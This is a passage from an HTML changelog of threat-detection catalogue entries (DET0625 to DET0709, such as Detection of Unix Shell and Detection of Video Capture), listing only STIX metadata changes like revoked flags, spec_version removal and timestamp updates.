Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0625] Detection of System Checks</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0601] Detection of System Information Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0634] Detection of System Network Configuration Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.677000+00:00</td></tr></tbody></table></details><hr><h4>[DET0636] Detection of System Network Connections Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.682000+00:00</td></tr></tbody></table></details><hr><h4>[DET0689] Detection of System Runtime API Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.683000+00:00</td></tr></tbody></table></details><hr><h4>[DET0683] Detection of Transmitted Data Manipulation</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.675000+00:00</td></tr></tbody></table></details><hr><h4>[DET0626] Detection of URI Hijacking</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.668000+00:00</td></tr></tbody></table></details><hr><h4>[DET0690] Detection of Uninstall Malicious Application</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.678000+00:00</td></tr></tbody></table></details><hr><h4>[DET0607] Detection of Unix Shell</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0699] Detection of User Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.679000+00:00</td></tr></tbody></table></details><hr><h4>[DET0695] Detection of Video Capture</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.692000+00:00</td></tr></tbody></table></details><hr><h4>[DET0606] Detection of Virtualization Solution</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.672000+00:00</td></tr></tbody></table></details><hr><h4>[DET0616] Detection of Virtualization/Sandbox Evasion</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.687000+00:00</td></tr></tbody></table></details><hr><h4>[DET0620] Detection of Web Protocols</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.674000+00:00</td></tr></tbody></table></details><hr><h4>[DET0672] Detection of Web Service</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_removed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>2.1</td><td style='border: 1px solid black;border-collapse: collapse;'></td></tr></tbody></table><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>created</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21 15:10:28.402000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-21T15:10:28.402Z</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 16:34:50.680000+00:00</td></tr></tbody></table></details><hr><h4>[DET0709] Detection of Wi-Fi Discovery</h4><p><b>Current version</b>: 1.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>dictionary_item_added</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>revoked</td><td style='border: 1px solid black;border-collapse: collapse;'></td><td style='border: 1px solid black;border-collapse: collapse;'>False</td></tr></tbody></table><table style='border: 